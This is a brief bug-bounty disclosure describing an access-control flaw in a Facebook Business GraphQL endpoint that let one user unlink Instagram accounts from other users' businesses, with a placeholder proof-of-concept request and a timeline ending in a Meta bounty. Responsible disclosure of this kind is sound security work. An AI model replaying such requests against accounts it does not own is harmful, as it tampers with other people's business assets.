Description
There exists a GraphQL endpoint which allowed me to unlink the Instagram accounts linked to FB business.
Impact
A malicious user can unlink the Instagram accounts that are linked to the FB business of other users.
Proof of Concept
POST
business.facebook.com/api/graphql/
variables={"businessID":"[BUSINESS_ID]","instagramAccountID":"[INSTAGRAM_V2_ID]"}&doc_id=REDACTED
Timeline
05 May 2022 - Report sent
17 May 2022 - Triaged
08 July 2022 - $2000 Bounty rewarded by Meta